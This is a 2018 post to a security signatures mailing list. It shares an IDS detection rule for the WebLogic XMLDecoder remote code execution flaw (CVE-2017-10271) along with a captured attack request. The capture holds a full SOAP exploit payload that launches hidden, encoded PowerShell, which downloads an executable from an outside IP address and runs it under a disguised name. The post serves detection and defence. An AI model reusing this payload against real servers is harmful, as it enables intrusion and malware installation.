[Emerging-Sigs] 2829182/ETPRO WEB_CLIENT Weblogic XMLDecoder RCE (CVE-2017-10271)

Packet Hack pckthck at gmail.com
Mon Jan 8 05:40:19 HST 2018


Just a FYI, 2829182 may catch some of the WSAT probes, but
we're seeing plenty of hits to just port 80:

alert tcp $EXTERNAL_NET any -> $HOME_NET $HTTP_PORTS (msg:"Possible
WSAT Exploit";content:"POST"; http_method; content:"/wls-wsat";
http_uri; nocase; rev:1; sid:91009735;)

-----------------------------------------------------------------------
Possible WSAT Exploit
108.61.217.150 : 45382  | XX.XX.XX.XX : 80       | tcp | 2018-01-06
03:35:35 |  91009735
-----------------------------------------------------------------------
POST /wls-wsat/CoordinatorPortType HTTP/1.1
Host: XX.XX.XX.XX
Connection: keep-alive
Accept-Encoding: gzip, deflate
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:56.0)
Gecko/20100101 Firefox/56.0
SOAPAction:
Content-Type: text/xml;charset=UTF-8
Content-Length: 1029

<soapenv:Envelope
xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"><soapenv:Header><work:WorkContext
xmlns:work="http://bea.com/2004/06/soap/workarea/"><java><object
class="java.lang.ProcessBuilder"><array class="java.lang.String"
length="9"><void index="0"><string>powershell.exe</string></void><void
index="1"><string>-NonI</string></void><void
index="2"><string>-W</string></void><void
index="3"><string>Hidden</string></void><void
index="4"><string>-NoP</string></void><void
index="5"><string>-Exec</string></void><void
index="6"><string>Bypass</string></void><void
index="7"><string>-Enc</string></void><void
index="8"><string>SQBuAHYAbwBrAGUALQBXAGUAYgBSAGUAcQB1AGUAcwB0ACAALQBVAHIAaQAgACIAaAB0AHQAcAA6AC8ALwAxADAAOAAuADYAMQAuADIAMQA3AC4AMQA1ADAALwBqAGEAdgBhAC4AZQB4AGUAIgAgAC0ATwB1AHQARgBpAGwAZQAgAC4ALwBzAHYAYwBoAG8AcwB0AC4AZQB4AGUAIAA7ACAALgAvAHMAdgBjAGgAbwBzAHQALgBlAHgAZQAgAA==</string></void></array><void
method="start"/></object></java></work:WorkContext></soapenv:Header><soapenv:Body/></soapenv:Envelope>

--pckthck


More information about the Emerging-sigs mailing list